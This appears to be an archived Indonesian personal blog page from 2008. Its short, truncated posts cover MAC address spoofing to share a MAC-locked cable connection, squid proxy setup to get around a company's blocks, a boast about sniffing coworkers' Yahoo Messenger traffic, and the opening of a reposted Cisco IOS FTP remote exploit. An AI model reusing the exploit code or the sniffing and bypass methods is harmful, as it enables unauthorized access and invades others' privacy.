Posts

Showing posts from August 3, 2008

mac address spoofing ( Fastnet )

Image
di kamar sambil menyalakan pc akhirnya sempetin buka blog lagi , beruntung tinggal di daerah yang sudah terjangkau oleh tv cable + internet juga , lumayan lah koneksi yang hebatnya neh koneksi tv cable ini bisa 100 kbps waaaaah kapan naiknya ya ... perasaan kmaren cuma 50 kbps ... asyik deehh .......



ok back to mac address , saya tau kenapa fastnet ini lock menggunakan mac address ... supaya gak si share tuh ...

kebetulan dirumah sih ada hotspot dan menggunakan wifi wrt54gl ( ios nya sudah di upgrade dd-wrt ) sudah mendukung mac address cloning ...



akhirnya share deh ......

)*

Routing ... pak penari ...

Sambil tersipu malu .. bapak itu meminta tolong kepada saya ..
"ade mau kemana bapak numpang donk de"
aku : "saya mau pulang pak"
"saya boleh numpang gak de sampai kampung rambutan"
aku : "silahkan pak naik motor saya"
"maaf kalau saya merepoti ade "
aku : "ah gak apa2x pak".

yah sepanjang jalan dia cerita bahwa dia adalah penari untuk acara pernikahan temanku .. didalam suatu pesta pernikahan biasanya ada yang menari dan itulah dia , sambil becerita dia tentang dirinya dan dia mempunyai anak 4 .. dibalik mukanya itu masih ada bekas make up ya mungkin itulah profesi sebagai penari ... , ya setelah sampai terminal kampung rambutan ... dia terus menyesali dirinya telah merepotkan aku , aku bilang tidak apa2x dan aku bilang sama bapak itu agar berhati-hati.

dia menginginkan menaiki bus ke arah grogol ... tetapi yang dia minta untuk naik dari pasar minggu ...

wah untuk mempersingkat perjalanan akhirnya aku terpaksa menginginkan melewat…

OPENSER VERSI KU ... ( VOIP )

Image
Sambil denger Streaming Server : http://10.11.21.200:9000/D%27MASIV/D%27Masiv%20-%20Cinta%20Sampai%20Disini.mp3 , DMASIV :D cinta sampai disini ....

Streaming server emang mantep berguna juga , bagusnya cloud nya 10.x.x.x , kalo yang mau silahkan di http://10.11.21.200:9000 , mungkin aja saya satu network dengan mu dan mungkin saja saya di ip 10.x.x.x dan mungkin saja saya ada di system kamu :D bercokol di tempat mu membaca semua log2x mu , EOF

OPENSER : http://www.sekuritionline.net/artikel/openser.pdf by me .........

Next Time Install Streaming MP3

Counter pengunjung hit di situs melalui squid - awstats

kalau datanya sedikit sih ok , cuma banyak banget hahahahahahaha sampe gw ngakak sendiri liat neh log cuma configure yang perlu diambil access.log.* yang di log squidnya di salah satu situs < 100 besar di indonesia ........

ContentKrtRack09-WebAcc03 squid # ls -la
total 556932
drwxr-x--- 2 squid squid 4096 Aug 7 04:02 .
drwxr-xr-x 16 root root 4096 Aug 7 13:35 ..
-rw-r----- 1 squid squid 152194900 Aug 7 15:03 access.log
-rw-r----- 1 squid squid 17406611 Jul 29 04:02 access.log.10.gz
-rw-r----- 1 squid squid 8956939 Jul 28 04:02 access.log.11.gz
-rw-r----- 1 squid squid 10796618 Jul 27 04:02 access.log.12.gz
-rw-r----- 1 squid squid 14506617 Jul 26 04:02 access.log.13.gz
-rw-r----- 1 squid squid 16914358 Jul 25 04:02 access.log.14.gz
-rw-r----- 1 squid squid 13603913 Jul 24 04:02 access.log.15.gz
-rw-r----- 1 squid squid 16074466 Jul 23 04:02 access.log.16.gz
-rw-r----- 1 squid squid 16285286 Jul 22 04:02 access.log.17.gz
-rw-r----- 1 squid squid 8277129 Jul …

Hari yang tidak cerah .... its Gone Over Now For Me ....

Image
/*

Cisco IOS FTP server remote exploit by Andy Davis 2008

Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007

Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router

Removes the requirement to authenticate and escalates to level 15

*********************************************************************
To protect the innocent a critical step has been omitted, which means
the shellcode will only execute when the router is attached to gdb.
I'm sure the PowerPC shellcoders out there will work it out...
*********************************************************************

Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
on the original IOS security research

iosftpexploit googlemail 'dot' com

*/

#include
#include
#include
#include





#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x818…

UFO Oh UFO ... Pengen Naik pesawat Kamu ...

Duh aku termasuk penggila ufo nih ... coret-coret aja ke blog ...
begini dari sma dulu aku sih penasaran sama ufo kenapa ... karena dulu waktu di tebet saya pernah melihat ufo dan masyarakat disana gempar , gimana gak gempar ada yang teriak2x ufo .... , setelah kejadian itu besoknya cari di internet ... seingaktku itu kelas 2 sma lho , iseng-iseng browsing cari artikel akhirnya aku mengakui keberadaannya ...

ufo = segitiga bermuda ( Lost World ) yap mungkin ... ahh pesawatnya yang aku butuhkan ..... supaya bisa dilihat ... pake BBM gak yaa...

ingin lihat videonya youtube.com aja deh ...

By Pass Pake Proxy

Wah neh artikel buat lagi deh soalnnya buat temen di medan namanya rani... , gipula dibuat supaya dia bisa browsing dan kebetulan seantero perusahaan ini pakai segmen 10.x.x.x berikut ujicoba proxy pakai squid ... lucu deh sampai sampai dia takut :D
ngapain takut la wong ini era kebebasan , kebebasan dalam berkarya , hacking its art ... emang kacrut deh tuh si admin masih suka aja ngeblok :D hihiihhiih

[root@devel1 ~]# cat /etc/squid/squid.conf

#The ports our Squid will listen on
http_port 8080
icp_port 3130

#cgi-bins will not be cached
acl QUERY urlpath_regex cgi-bin \?
no_cache deny QUERY

#Memory the Squid will use. Well, Squid will use far more than that.
cache_mem 128 MB

#250 means that Squid will use 250 megabytes of disk space
cache_dir ufs /cache 250 16 256
redirect_rewrites_host_header off
cache_replacement_policy GDSF
acl localnet src 192.168.1.0/255.255.255.0
acl localhost src 127.0.0.1/255.255.255.255
acl telkom src 10.0.0.0/255.0.0.0
acl Safe_ports port 80 443 210 119 70 20 21 1025-65535
ac…

Sniffing Yahoo Messenger

Edan Pagi-pagi buta gw berangkat ke kantor wuzzzz 8 kurang 15 sampe kantor , tumben gw dateng secepat itu ahhh biasa deh kalau sudah awal bulan kejar tayang bikin laporan , malem minggu bukannya ngedate malah monitoring server :D maklum ada event chat bareng carrisa putri karena kalo nggak bisa gawat ... berkorban dikit lah ... back to work senin ini ada di benak kepala gw ahh iseng aja deh sniffing ym , dan its works ... mayan deh buat lihat keadaan sekitar , maaf pula buat yang kena sniffing , salah sendiri kenapa gak di secure ... ternyata dibalik gajah ada semutnya ... dan siapa itu gajah dan siapa itu semut ...

lihat disini : http://www.sekuritionline.net/soft/intipym.pdf


i'm inetholic now and then .... perhaps ... u know how the fell like me ... its terrible